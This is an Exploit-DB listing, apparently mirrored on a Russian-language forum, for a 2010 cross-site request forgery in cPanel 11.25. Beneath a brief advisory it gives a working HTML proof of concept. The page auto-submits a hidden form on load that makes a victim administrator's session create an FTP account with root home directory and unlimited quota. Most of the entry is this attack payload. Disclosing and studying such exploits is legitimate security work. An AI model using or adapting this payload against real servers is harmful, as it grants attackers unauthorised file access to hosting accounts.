- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34255
- Проверка EDB
-
- Пройдено
- Автор
- G0D-F4TH3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-07-03
cPanel 11.25 - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/41391/info
cPanel is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions. This may lead to further attacks.
cPanel 11.25 is vulnerable; other versions may also be affected.
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.example.com/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>
- Источник
- www.exploit-db.com